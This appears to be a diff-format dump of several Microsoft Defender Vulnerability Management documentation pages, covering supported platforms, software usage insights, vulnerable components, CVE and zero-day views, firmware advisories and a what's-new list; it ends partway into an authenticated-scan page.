-Red Hat Enterprise Linux 7.2 or higher including matching EUS releases (\* See "Important" notice below)|Yes|Yes|Yes|Yes|Yes
-CentOS 7.2 or higher|Yes|Yes|Yes|Yes|Yes
-Ubuntu 16.04 LTS or higher LTS (excluding Ubuntu Pro)|Yes|Yes|Yes|Yes|Yes
-Oracle Linux 7.2 or higher|Yes|Yes|Yes|Yes|Yes
-SUSE Linux Enterprise Server 12 or higher|Yes|Yes|Yes|Yes|Yes
-Linux Debian 9 or higher|Yes|Yes|Yes|Yes|Yes
-Fedora 33 or higher|Yes|Yes|Yes|Yes|Yes
-Amazon Linux 2|Yes|Yes|Yes|Yes|Yes
-Android 6.0 or higher|Yes|Yes|Not supported|Not supported|Not supported
-iOS 12.0 or higher|Yes|Yes|Not supported|Not supported|Not supported
-
-> [!NOTE]
-> Some features are not available for down-level Operating System, check the Microsoft Defender portal for more details on supported OS.
-
-> [!IMPORTANT]
-> \* Red Hat Enterprise Linux:
-> "The vulnerability data provided and shown as part of your Microsoft Defender for Endpoint services is made available to you in its raw form, "AS IS", from Red Hat, Inc., and might not be up to date. The data that is accessible in the Red Hat Security Data API is licensed under the Creative Commons Attribution 4.0 International License. You bear the risk in using this data. Microsoft and its third-party suppliers disclaim any and all liability for consequential and other indirect damages and implied warranties, including implied warranties of non-infringement, merchantability and fitness for a particular purpose. © 2020 Red Hat. All rights reserved. © 2020 Microsoft. All rights reserved."
-
-## Related articles
--- [Prerequisites & permissions](tvm-prerequisites.md)
security Tvm Usage Insights https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-vulnerability-management/tvm-usage-insights.md
- Title: Software usage insights
-description: Use Microsoft Defender Vulnerability Management to assess software usage
-----
- - m365-security
- - Tier2
- Previously updated : 10/06/2022--
-# Software usage insights
-
-**Applies to:**
--- [Microsoft Defender Vulnerability Management](https://go.microsoft.com/fwlink/?linkid=2229011)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- [Microsoft Defender for Servers Plan 1 & 2](/azure/defender-for-cloud/plan-defender-for-servers-select-plan)
-
-
-Defender Vulnerability Management software usage information gives you insights into the total number of devices using an application in your organization and the median usage (in days) for that application over the past 30 days.
-
-Software usage information is critical when it comes to evaluating software vulnerabilities in your organization. When vulnerable applications are widely and frequently used, it poses a security risk. These insights can help organizations understand the potential affect of blocking vulnerable applications.
-
-> [!TIP]
-> Did you know you can try all the features in Microsoft Defender Vulnerability Management for free? Find out how to [sign up for a free trial](../defender-vulnerability-management/defender-vulnerability-management-trial.md).
-
-## Minimum requirements
-
-**Microsoft Defender Antivirus (active or passive mode)**:
-The detection of file execution events requires Microsoft Defender Antivirus to be enabled in active or passive mode. To learn more, see [Deploy Microsoft Defender Antivirus](../defender-endpoint/deploy-manage-report-microsoft-defender-antivirus.md).
-
-## View software usage information
-
-Daily software usage is calculated from process events collected by the core endpoint detection and response service for all onboarded devices. Software usage information can be viewed through the following experiences in the Microsoft Defender portal.
-
-### Software inventory view
-
-You can view software usage by selecting an application in the software inventory page. A flyout panel will open with more details including data related to that software's usage over the past 30 days.
--
-### Software page view
-
-Software usage for a specific application is also available in the software page. To view the software page:
-
-1. Go to **Vulnerability management** > **Software inventory**
-2. Select an application from the list
-3. Select **Open software page** in the flyout
-
-The Software page opens with the software usage information displayed on the Overview tab:
--
-Select the **Installed devices** tab to see the number of days the software was in use, per device, in the last 30 days.
--
-You can also view **Software usage (days)** on the **Version distribution** tab in the software page.
-
-### Security recommendations page
-
-Software usage insights can be helpful to determine the overall impact of a vulnerability. To view the **Software usage insights** when reviewing security recommendations:
-
-1. Go to **Vulnerability management** > **Recommendations**
-2. Select an application from the list
-
-The Recommendations page opens with the software usage information displayed:
--
-> [!NOTE]
-> If you don't see usage insights, it's because that application is currently not supported. Software usage is currently not supported for:
->
-> - Software usage related to operating systems
-> - Software usage related to apps for macOS and Linux
-> - Software usage for apps where Microsoft does not have sufficient information about the application
-
-## Related articles
--- [Vulnerabilities in my organization](tvm-weaknesses.md)-- [Block vulnerable applications](tvm-block-vuln-apps.md)-- [Vulnerability management overview](defender-vulnerability-management.md)
security Tvm Vulnerable Components https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-vulnerability-management/tvm-vulnerable-components.md
- Title: Vulnerable components
-description: The Vulnerable components page lists components with known critical vulnerabilities.
-----
- - m365-security
- - Tier1
- Previously updated : 12/20/2023--
-# Vulnerable components
-
-**Applies to:**
--- [Microsoft Defender Vulnerability Management](https://go.microsoft.com/fwlink/?linkid=2229011)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- [Microsoft Defender for Servers Plan 1 & 2](/azure/defender-for-cloud/plan-defender-for-servers-select-plan).--
-It's becoming increasingly difficult for security administrators to identify and mitigate the security and compliance risks associated with common, proprietary, and open-source software components and dependencies used in their organizations. To help address this challenge, Defender Vulnerability Management provides support to identify, report on, and recommend remediations for vulnerabilities found in components known to have had security issues in the past.
-
-With visibility into which vulnerable components are present on a device, security administrators can focus their attention and resources on taking steps to reduce the associated risks.
-
-> [!TIP]
-> Did you know you can try all the features in Microsoft Defender Vulnerability Management for free? Find out how to [sign up for a free trial](../defender-vulnerability-management/defender-vulnerability-management-trial.md).
-
-## Navigate to the vulnerable components page
-
-1. Go to **Vulnerability management** \> **Inventories** in the [Microsoft Defender portal](https://security.microsoft.com).
-2. Select the **Vulnerable components** tab.
-
-The **Vulnerable components** page opens with a list of known vulnerable components identified in your organization. It provides information including the component name and vendor, the number of weaknesses found for that component, and if there are active threats or alerts associated with it.
--
-> [!NOTE]
-> Support is currently only available for the following vulnerable components:
->
-> - Apache Commons Text
-> - Apache Log4j
-> - Apache struts
-> - libwebp
-> - LiteDB
-> - OpenSSL
-> - Spring Framework
-
-### Component details
-
-Select a vulnerable component to open a flyout pane where you'll find more information about that vulnerable component.
--
-Select the **Installed devices** tab to see a list of devices the component is installed on.
-
-Select the **Vulnerable files** tab to see information on the vulnerable file paths and versions, the related vulnerabilities, and the exposed devices.
--
-From the flyout pane, you can also dive deeper into the vulnerable component by selecting **Open component page**, see [Vulnerable components page](#vulnerable-components-page), or flag any technical inconsistencies by selecting **Report inaccuracy**, see [Report inaccuracy](./tvm-software-inventory.md#report-inaccuracy).
-
-## Vulnerable components page
-
-Select **Open component page** for a vulnerable component to see all the details for that component:
--
-The page includes information on the component vendor, the devices the component is installed on, and data visualizations showing the number of discovered vulnerabilities and exposed devices.
-
-Tabs are available with information specific to the vulnerable component, such as:
--- Corresponding security recommendations for the vulnerabilities identified.-- Vulnerable files information including the vulnerable file paths and versions, the related vulnerabilities, along with the exposed devices.-
-### View recommendations
-
-To view the security recommendations for vulnerable components:
-
-1. Go to **Vulnerability management** \> **Inventories** in the [Microsoft Defender portal](https://security.microsoft.com).
-2. Select the **Vulnerable components** tab.
-3. Select a vulnerable component and select **Go to related security recommendation** in the flyout pane.
-
-Or select **Open component page** from the component flyout pane and select the **Security recommendations** tab from the component page.
--
-When you select a security recommendation, you'll see in the flyout pane that the security recommendation is of type **Attention required**.
-
-This is because there's no easy way to fix or patch a vulnerable component. The **Attention required** label allows security administrators to use the information about the vulnerable component to evaluate the effect of any proposed remediation on the whole organization.
-
-### Vulnerable components on devices
-
-You can also view a list of vulnerable components on a device. With a device page open, select **Inventories** and then **Vulnerable components** to see a list of vulnerable components installed on that device.
-
-## Related articles
--- [Security recommendations](tvm-security-recommendation.md)-- [Software inventory](tvm-software-inventory.md)-- [View and organize the Microsoft Defender for Endpoint Devices list](../defender-endpoint/machines-view-overview.md)
security Tvm Vulnerable Devices Report https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-vulnerability-management/tvm-vulnerable-devices-report.md
- Title: Vulnerable devices report
-description: A report showing vulnerable device trends and current statistics so you can understand the breath and scope of your device exposure.
-----
- - m365-security
- - Tier1
- Previously updated : 03/04/2022--
-# Vulnerable devices report
-
-**Applies to:**
--- [Microsoft Defender Vulnerability Management](https://go.microsoft.com/fwlink/?linkid=2229011)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- [Microsoft Defender for Servers Plan 1 & 2](/azure/defender-for-cloud/plan-defender-for-servers-select-plan)-
-> [!TIP]
-> Did you know you can try all the features in Microsoft Defender Vulnerability Management for free? Find out how to [sign up for a free trial](../defender-vulnerability-management/defender-vulnerability-management-trial.md).
-
-The report shows graphs and bar charts with vulnerable device trends and current statistics. The goal is for you to understand the breath and scope of your device exposure.
-
-Access the report in the Microsoft Defender portal by going to **Reports > Vulnerable devices**
-
-There are two columns:
--- Trends (over time). Can show the past 30 days, 3 months, 6 months, or a custom date range.-- Status (current information)-
-**Filter**: You can filter the data by vulnerability severity levels, exploit availability, vulnerability age, operating system platform, Windows 10 or Windows 11 version, or device group.
-
-**Drill down**: If there is an insight you want to explore further, select the relevant bar chart to view a filtered list of devices in the Device inventory page. From there, you can export the list.
-
-## Severity level graphs
-
-Each device is counted only once according to the most severe vulnerability found on that device.
--
-## Exploit availability graphs
-
-Each device is counted only once based on the highest level of known exploit.
--
-## Vulnerability age graphs
-
-Each device is counted only once under the oldest vulnerability publication date. Older vulnerabilities have a higher chance of being exploited.
--
-## Vulnerable devices by operating system platform graphs
-
-The number of devices on each operating system that are exposed due to software vulnerabilities.
--
-## Vulnerable devices by Windows version graphs
-
-The number of devices on each Windows 10 or Windows 11 version that are exposed due to vulnerable applications or OS.
--
-## Related topics
--- [Security recommendations](tvm-security-recommendation.md)
security Tvm Weaknesses Security Advisories https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-vulnerability-management/tvm-weaknesses-security-advisories.md
- Title: Security advisories
-description: Lists the firmware security advisories for devices in your organization. Discovered by the Microsoft Defender vulnerability management capabilities.
-----
- - m365-security
- - Tier1
- Previously updated : 01/25/2024--
-# Security advisories
-
-Security advisories provide an efficient way to view, track, and monitor firmware advisories for affected devices. You can filter on exposed devices and view advisories that affect specific devices. By monitoring these advisories, security teams can take action more quickly to prevent attackers from targeting firmware vulnerabilities.
-
-> [!NOTE]
-> This capability is currently available in public preview and may be substantially modified before it's commercially released.
-
-**Applies to:**
--- [Microsoft Defender Vulnerability Management](https://go.microsoft.com/fwlink/?linkid=2229011)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- [Microsoft Defender for Servers Plan 1 & 2](/azure/defender-for-cloud/plan-defender-for-servers-select-plan)-
-> [!NOTE]
-> To use this feature you'll require Microsoft Defender Vulnerability Management Standalone or if you're already a Microsoft Defender for Endpoint Plan 2 customer, the Defender Vulnerability Management add-on.
-
-> [!TIP]
-> Did you know you can try all the features in Microsoft Defender Vulnerability Management for free? Find out how to [sign up for a free trial](../defender-vulnerability-management/defender-vulnerability-management-trial.md).
-
-To view firmware security advisories:
-
-1. Select **Weaknesses** from the **Vulnerability management** navigation menu in the [Microsoft Defender portal](https://security.microsoft.com)
-2. Select the **Security advisories** tab.
--
-Security advisories include information about specific version of affected devices or software in your organization that are affected and, if available, instructions for how to update the firmware to address the vulnerability.
-
-> [!NOTE]
-> Security Advisories are available for the following vendors: Lenovo, Dell, HP.
-
-For each published advisory, you can see the following information:
--- Advisory ID-- Severity (provided by the vendor)-- Related CVEs-- Advisory link-- Vendor-- Age-- Published on-- Updated on-- Exposed devices-
-## Related articles
--- [Security recommendations](tvm-security-recommendation.md)-- [Weaknesses](tvm-weaknesses.md)
security Tvm Weaknesses https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-vulnerability-management/tvm-weaknesses.md
- Title: Vulnerabilities in my organization
-description: Lists the common vulnerabilities and exposures (CVE) ID of weaknesses found in the software running in your organization. Discovered by the Microsoft Defender vulnerability management capabilities.
-----
- - m365-security
- - Tier1
- Previously updated : 01/09/2024--
-# Vulnerabilities in my organization
-
-The [Weaknesses page](https://security.microsoft.com/vulnerabilities/cves) in Microsoft Defender Vulnerability Management lists known Common Vulnerabilities and Exposures (CVE) by their CVE ID.
-
-CVE IDs are unique IDs assigned to publicly disclosed cybersecurity vulnerabilities that affect software, hardware and firmware. They provide organizations with a standard way to identify and track vulnerabilities, and helps them understand, prioritize, and address these vulnerabilities in their organization. CVEs are tracked in a public registry accessed from [https://www.cve.org/](https://www.cve.org/).
-
-Defender Vulnerability Management uses endpoint sensors to scan and detect for these and other vulnerabilities in an organization.
-
-**Applies to:**
--- [Microsoft Defender Vulnerability Management](https://go.microsoft.com/fwlink/?linkid=2229011)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- [Microsoft Defender for Servers Plan 1 & 2](/azure/defender-for-cloud/plan-defender-for-servers-select-plan)-
-> [!IMPORTANT]
-> Defender Vulnerability Management can help identify Log4j vulnerabilities in applications and components. [Learn more](../defender-endpoint/tvm-manage-Log4shell-guidance.md).
-
-> [!TIP]
-> Did you know you can try all the features in Microsoft Defender Vulnerability Management for free? Find out how to [sign up for a free trial](../defender-vulnerability-management/defender-vulnerability-management-trial.md).
-
-## Weaknesses overview page
-
-To access the Weaknesses page, select **Weaknesses** from the **Vulnerability management** navigation menu in the [Microsoft Defender portal](https://security.microsoft.com)
-
-The Weaknesses page opens with a list of the CVEs your devices are exposed to. You can view the severity, Common Vulnerability Scoring System (CVSS) rating, corresponding breach and threat insights, and more.
-
- :::image type="content" source="../../media/defender-vulnerability-management/tvm-weaknesses-overviewnew.png" alt-text="Screenshot of the weaknesses landing page" lightbox="../../media/defender-vulnerability-management/tvm-weaknesses-overviewnew.png":::
-
-> [!NOTE]
-> If there is no official CVE-ID assigned to a vulnerability, the vulnerability name is assigned by Microsoft Defender Vulnerability Management and will be the format **TVM-2020-002**.
-
-> [!NOTE]
-> The maximum number of records you can export from the weaknesses page to a CSV file is 10,000.
-
-### Breach and threat insights
-
-It's important to prioritize recommendations that are associated with ongoing threats. You can use the information available in the **Threats** column to help you prioritize vulnerabilities. To see vulnerabilities with ongoing threats, filter the **Threats** column by:
--- Associated active alert-- Exploit is available-- Exploit is Verified-- This exploit is part of an exploit kit-
-The threat insights icon ![Simple drawing of a red bug.](../../media/defender-vulnerability-management/tvm_bug_icon.png) is highlighted in the **Threats** column if there are associated exploits in a vulnerability.
-
- :::image type="content" source="../../media/defender-vulnerability-management/weaknesses-threats.png" alt-text="Screenshot of the threats column icons" lightbox="../../media/defender-vulnerability-management/weaknesses-threats.png":::
-
-Hovering over the icon shows whether the threat is a part of an exploit kit or connected to specific advanced persistent campaigns or activity groups. When available, there's a link to a Threat Analytics report with zero-day exploitation news, disclosures, or related security advisories.
-
-![Threat insights text that that could show up when hovering over icon. This one has multiple bullet points and linked text.](../../media/defender-vulnerability-management/tvm-threat-insights.png)
-
-The breach insights icon is highlighted if there's a vulnerability found in your organization. ![Simple drawing of an arrow hitting a target.](../../media/defender-vulnerability-management/tvm_alert_icon.png).
-
-![Example of a breach insights text that could show up when hovering over icon. This one says "possible active alert is associated with this recommendation.](../../media/defender-vulnerability-management/tvm-breach-insights.png)
-
-The **Exposed Devices** column shows how many devices are currently exposed to a vulnerability. If the column shows 0, that means you aren't at risk.
-
-## Gain vulnerability insights
-
-If you select a CVE from the weaknesses page, a flyout panel opens with more information such as the vulnerability description, details and threat insights. The AI generated vulnerability description provides detailed information on the vulnerability, its impact, recommended remediation steps, and any additional information, if available.
-
- :::image type="content" source="../../media/defender-vulnerability-management/weaknesses-cve-description.png" alt-text="Screenshot of the weaknesses weaknesses-flyout pane" lightbox="../../media/defender-vulnerability-management/weaknesses-cve-description.png":::
-
-For each CVE, you can see a list of the exposed devices and the affected software.
-
-## Related security recommendations
-
-Use security recommendations to remediate the vulnerabilities in exposed devices and to reduce the risk to your assets and organization. When a security recommendation is available, you can select **Go to the related security recommendation** for details on how to remediate the vulnerability.
--
-Recommendations for a CVE are often to remediate the vulnerability through a security update for the related software. However, Some CVEs won't have a security update available. This might apply to all the related software for a CVE or just a subset, for example, a software vendor might decide not to fix the issue on a particular vulnerable version.
-
-When a security update is only available for some of the related software, the CVE will have the tag 'Some updates available' under the CVE name. Once there is at least one update available, you have the option to go to the related security recommendation.
-
-If there's no security update available, the CVE will have the tag 'No security update' under the CVE name. There will be no option to go to the related security recommendation as software that doesn't have a security update available is excluded from the Security recommendations page.
-
- > [!NOTE]
- > Security recommendations only include devices and software packages that have security updates available.
-
-## Request CVE support
-
-A CVE for software that isn't currently supported by vulnerability management still appears in the Weaknesses page. Because the software is not supported, only limited data will be available. Exposed device information will not be available for CVEs with unsupported software.
-
-To view a list of unsupported software, filter the weaknesses page by the "Not available" option in the "Exposed devices" section.
-
-You can request for support to be added to Defender Vulnerability Management for a particular CVE. To request support:
-
-1. Select the CVE from the [Weaknesses](https://security.microsoft.com/vulnerabilities/cves) page in the Microsoft Defender portal
-2. Select **Please support this CVE** from the Vulnerability details tab
-
-This request will be sent to Microsoft and will assist us in prioritizing this CVE among others in our system.
--
-## View Common Vulnerabilities and Exposures (CVE) entries in other places
-
-### Top vulnerable software in the dashboard
-
-1. Go to the [Defender Vulnerability Management dashboard](tvm-dashboard-insights.md) and scroll down to the **Top vulnerable software** widget. You will see the number of vulnerabilities found in each software, along with threat information and a high-level view of device exposure over time.
--
-2. Select the software you want to investigate.
-3. Select the **Discovered vulnerabilities** tab.
-4. Select the vulnerability that you want to investigate to open up a flyout panel with the CVE details.
-
-### Discover vulnerabilities in the device page
-
-View related weaknesses information in the device page.
-
-1. Select **Devices** from the **Assets** navigation menu in the [Microsoft Defender portal](https://security.microsoft.com).
-2. In the **Device inventory** page, select the device name that you want to investigate.
-3. Select **Open device page** and select **Discovered vulnerabilities** from the device page.
-4. Select the vulnerability that you want to investigate to open up a flyout panel with the CVE details.
-
-#### CVE Detection logic
-
-Similar to the software evidence, we show the detection logic we applied on a device in order to state that it's vulnerable.
-
-To see the detection logic:
-
-1. Select a device from the Device inventory page.
-2. Select **Open device page** and select **Discovered vulnerabilities** from the device page.
-3. Select the vulnerability you want to investigate.
-
-A flyout will open and the **Detection logic** section shows the detection logic and source.
--
-The "OS Feature" category is also shown in relevant scenarios. This is when a CVE would affect devices that run a vulnerable OS if a specific OS component is enabled. For example, if Windows Server 2019 or Windows Server 2022 has vulnerability in its DNS component we'll only attach this CVE to the Windows Server 2019 and Windows Server 2022 devices with the DNS capability enabled in their OS.
-
-## Report inaccuracy
-
-Report a false positive when you see any vague, inaccurate, or incomplete information. You can also report on security recommendations that have already been remediated.
-
-1. Open the CVE on the Weaknesses page.
-2. Select **Report inaccuracy** and a flyout pane will open.
-3. From the flyout pane, choose an issue to report.
-4. Fill in the requested details about the inaccuracy. This will vary depending on the issue you're reporting.
-5. Select **Submit**. Your feedback is immediately sent to the Microsoft Defender Vulnerability Management experts.
--
-## Related articles
--- [Security recommendations](tvm-security-recommendation.md)-- [Software inventory](tvm-software-inventory.md)-- [Dashboard insights](tvm-dashboard-insights.md)
security Tvm Zero Day Vulnerabilities https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-vulnerability-management/tvm-zero-day-vulnerabilities.md
- Title: Mitigate zero-day vulnerabilities
-description: Learn how to find and mitigate zero-day vulnerabilities in your environment through Microsoft Defender Vulnerability Management.
-----
- - m365-security
- - Tier1
- Previously updated : 03/04/2022--
-# Mitigate zero-day vulnerabilities
-
-**Applies to:**
--- [Microsoft Defender Vulnerability Management](https://go.microsoft.com/fwlink/?linkid=2229011)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- [Microsoft Defender for Servers Plan 1 & 2](/azure/defender-for-cloud/plan-defender-for-servers-select-plan)-
-A zero-day vulnerability is a flaw in software for which no official patch or security update has been released. A software vendor may or may not be aware of the vulnerability, and no public information about this risk is available. Zero-day vulnerabilities often have high severity levels and are actively exploited.
-
-Vulnerability management will only display zero-day vulnerabilities it has information about.
-
-> [!TIP]
-> Did you know you can try all the features in Microsoft Defender Vulnerability Management for free? Find out how to [sign up for a free trial](../defender-vulnerability-management/defender-vulnerability-management-trial.md).
-
-## Find information about zero-day vulnerabilities
-
-Once a zero-day vulnerability has been found, information about it will be conveyed through the following experiences in the Microsoft Defender portal.
-
-> [!NOTE]
-> 0-day vulnerability capability is currently available only for Windows products.
-
-### Defender Vulnerability Management dashboard
-
-Look for recommendations with a zero-day tag in the "Top security recommendations" card.
--
-Find top software with the zero-day tag in the "Top vulnerable software" card.
--
-### Weaknesses page
-
-Look for the named zero-day vulnerability along with a description and details.
--- If this vulnerability has a CVE-ID assigned, you'll see the zero-day label next to the CVE name.--- If this vulnerability has no CVE-ID assigned, you'll find it under an internal, temporary name that looks like "TVM-XXXX-XXXX". The name will be updated once an official CVE-ID has been assigned, but the previous internal name will still be searchable and found in the side-panel.--
-### Software inventory page
-
-Look for software with the zero-day tag. Filter by the "zero day" tag to only see software with zero-day vulnerabilities.
--
-### Software page
-
-Look for a zero-day tag for each software that has been affected by the zero-day vulnerability.
--
-### Security recommendations page
-
-View clear suggestions about remediation and mitigation options, including workarounds if they exist. Filter by the "zero day" tag to only see security recommendations addressing zero-day vulnerabilities.
-
-If there's software with a zero-day vulnerability and additional vulnerabilities to address, you'll get one recommendation about all vulnerabilities.
--
-## Addressing zero-day vulnerabilities
-
-Go to the security recommendation page and select a recommendation with a zero-day. A flyout will open with information about the zero-day and other vulnerabilities for that software.
-
-There will be a link to mitigation options and workarounds if they are available. Workarounds may help reduce the risk posed by this zero-day vulnerability until a patch or security update can be deployed.
-
-Open remediation options and choose the attention type. An "attention required" remediation option is recommended for the zero-day vulnerabilities, since an update hasn't been released yet. You won't be able to select a due date, since there's no specific action to perform. If there are older vulnerabilities for this software you wish to remediation, you can override the "attention required" remediation option and choose "update."
--
-## Track zero-day remediation activities
-
-Go to the [Remediation](tvm-remediation.md) page to view the remediation activity item. If you chose the "attention required" remediation option, there will be no progress bar, ticket status, or due date since there's no actual action we can monitor. You can filter by remediation type, such as "software update" or "attention required," to see all activity items in the same category.
-
-## Patching zero-day vulnerabilities
-
-When a patch is released for the zero-day, the recommendation will be changed to "Update" and a blue label next to it that says "New security update for zero day." It will no longer consider as a zero-day, the zero-day tag will be removed from all pages.
-
-## Related articles
--- [Dashboard](tvm-dashboard-insights.md)-- [Security recommendations](tvm-security-recommendation.md)-- [Software inventory](tvm-software-inventory.md)-- [Vulnerabilities in my organization](tvm-weaknesses.md)
security Whats New In Microsoft Defender Vulnerability Management https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-vulnerability-management/whats-new-in-microsoft-defender-vulnerability-management.md
- Title: What's new in Microsoft Defender Vulnerability Management
-description: See what features are available in the latest release of Microsoft Defender for Vulnerability Management
-----
- - m365-security
- Previously updated : 02/26/2024--
-# What's new in Microsoft Defender Vulnerability Management Public Preview
-
-This article provides information about new features and important product updates for the latest release of Microsoft Defender Vulnerability Management public preview.
-
-> [!TIP]
-> Did you know you can try all the features in Microsoft Defender Vulnerability Management for free? Find out how to [sign up for a free trial](../defender-vulnerability-management/defender-vulnerability-management-trial.md).
-
-## February 2024
-
-### Vulnerable components
-
-Defender Vulnerability Management now provides the ability to identify, report on, and recommend remediation for common, proprietary, and open-source software components and dependencies known to have had security issues in the past. For more information, see [Vulnerable components](tvm-vulnerable-components.md).
-
-### Request of CVE support
-
-You can now request for support to be added to Defender Vulnerability Management for a particular Common Vulnerabilities and Exposures (CVE). For more information, see [Request CVE support](tvm-weaknesses.md#request-cve-support).
-
-### Vulnerability details updates
--- **Common Vulnerabilities and Exposures (CVE) AI generated description (Public Preview)**: A new AI generated vulnerability description is now in public preview. It appears on the vulnerability details page for a CVE and provide detailed information on the vulnerability, its impact, recommended remediation steps, and any additional information, if available.-- **CVSS vector string**: The CVSS vector string is a text representation of the CVSS score. It is commonly used to record or transfer CVSS metric information in a concise and machine-readable form. This string is now represented in the portal for every weakness, and can be pulled via the [List vulnerabilities API](../defender-endpoint/api/get-all-vulnerabilities.md) and Advanced Hunting. For more information on the CVSS Vector, see [Common Vulnerability Scoring System](https://www.first.org/cvss/specification-document#:~:text=The%20Common%20Vulnerability%20Scoring%20System,Threat%2C%20Environmental%2C%20and%20Supplemental)-
-### Other updates
-
-**Microsoft Defender Vulnerability Management Ninja training is now available**: For more information, see [Become a Microsoft Defender Vulnerability Management Ninja](https://techcommunity.microsoft.com/t5/microsoft-defender-vulnerability/become-a-microsoft-defender-vulnerability-management-ninja/ba-p/4003011)
-
-## August 2023
-
-<a name='microsoft-defender-vulnerability-management-permissions-are-now-integrated-with-microsoft-365-defender-unified-role-based-access-control-rbac'></a>
-
-### Microsoft Defender Vulnerability Management permissions are now integrated with Microsoft Defender XDR Unified role-based access control (RBAC)
-
-You can now control access and grant granular permissions for Microsoft Defender Vulnerability Management as part of the Microsoft Defender XDR Unified RBAC model. For more information, see [Microsoft Defender 365 Unified role-based access control (RBAC)](../defender/manage-rbac.md). You can add the new permissions to a custom role by selecting them from the **Security posture** permissions group when creating the role. For more information, see [Create custom roles with Microsoft Defender XDR Unified RBAC](../defender/create-custom-rbac-roles.md).
-
-### Microsoft Defender Vulnerability Management Standalone is now Generally Available
-
-To learn more about what's included in Microsoft Defender Vulnerability Management plans, see [Compare Microsoft Defender Vulnerability Management plans and capabilities](defender-vulnerability-management-capabilities.md).
-
-## March 2023
-
-Microsoft Defender Vulnerability Management add-on is now Generally Available. This includes consolidated inventories, new assessments, and mitigation tools to further enhance your vulnerability management program. To learn more about what's included in Microsoft Defender Vulnerability Management plans, see [Compare Microsoft Defender Vulnerability Management plans and capabilities](defender-vulnerability-management-capabilities.md).
-
-## December 2022
-
-Vulnerability assessment of apps on Microsoft Defender for Endpoint for iOS is now Generally Available. Defender for Endpoint on iOS supports vulnerability assessments of apps only for enrolled (MDM) devices. For more details, see [Configure vulnerability assessment of apps](/microsoft-365/security/defender-endpoint/ios-configure-features#configure-vulnerability-assessment-of-apps).
-
-## October 2022
-
-Several Linux platforms have high numbers of CVEs that are reported in official channels as not having a fix available (Red Hat, CentOS, Debian, and Ubuntu). This results in a high volume of non-actionable CVEs appearing in Microsoft Defender Vulnerability Management.
-
-To address this, Defender Vulnerability Management will no longer report such CVEs on the above Linux platforms. The new behavior may lead to reporting of fewer exposed devices and lower organization exposure score.
-
-## September 2022
--- Vulnerability assessment of apps on Microsoft Defender for Endpoint for iOS is now in public preview. Defender for Endpoint on iOS supports vulnerability assessments of apps only for enrolled (MDM) devices. For more information, see [Configure vulnerability assessment of apps](/microsoft-365/security/defender-endpoint/ios-configure-features#configure-vulnerability-assessment-of-apps). If you are interested in participating in the preview, share your tenant name and ID with us at: [mdatpmobile@microsoft.com](mailto:mdatpmobile@microsoft.com).-
-## August 2022
--- Defender Vulnerability Management is now supported for Amazon Linux 2 and Fedora 33 or higher.--- [Browser extensions APIs](../defender-endpoint/get-assessment-browser-extensions.md) </br>
- You can now use the new browser extensions APIs to view all browser extensions installed in your organization, including installed versions, permissions requested, and associated risk.
--- [Extended software inventory API support for non product code software](../defender-endpoint/get-assessment-non-cpe-software-inventory.md) </br>
- A new API is now available and returns all the data for installed software that doesn't have a [Common Platform Enumeration(CPE)](https://nvd.nist.gov/products/cpe). The information returned by this API, along with the information returned by the Export software inventory assessment API, for software that does have a CPE, gives you full visibility into the software installed across your organization and the devices it's installed on.
-
-## May 2022
--- **[Security baselines assessment](tvm-security-baselines.md)**: Create and manage baseline profiles to monitor the posture of your devices against their desired security state.-- **[Blocking vulnerable applications](tvm-block-vuln-apps.md)**: Give security admins the ability to block all currently known vulnerable versions of an application.-- **[Browser extensions assessment](tvm-browser-extensions.md)**: View all browser extensions installed on devices in your organization, including installed versions, permissions requested, and associated risk.-- **[Digital certificates assessment](tvm-certificate-inventory.md)**: View certificate details on devices in your organization, including expiration date, algorithm used, and key size.-- **[Network shares analysis](tvm-network-share-assessment.md)**: View information about exposed network shares and the recommendations that can help protect against vulnerabilities that could be exploited by attackers.-
-For more information on what's new with other Microsoft Defender security products, see:
--- [What's new in Microsoft Defender for Endpoint](../defender-endpoint/whats-new-in-microsoft-defender-endpoint.md)-- [What's new in Microsoft Defender XDR](../defender/whats-new.md)-- [What's new in Microsoft Defender for Office 365](../office-365-security/defender-for-office-365-whats-new.md)-- [What's new in Microsoft Defender for Identity](/defender-for-identity/whats-new)-- [What's new in Microsoft Defender for Cloud Apps](/cloud-app-security/release-notes)
security Windows Authenticated Scan https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-vulnerability-management/windows-authenticated-scan.md
- Title: Authenticated scan for Windows in Defender Vulnerability Management
-description: Find out about how to create Authenticated scans for Windows
----- Previously updated : 05/12/2022----
-# Authenticated scan for Windows
-
-**Applies to:**
--- [Microsoft Defender Vulnerability Management](https://go.microsoft.com/fwlink/?linkid=2229011)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- [Microsoft Defender for Servers Plan 2](/azure/defender-for-cloud/plan-defender-for-servers-select-plan)-
-> [!NOTE]
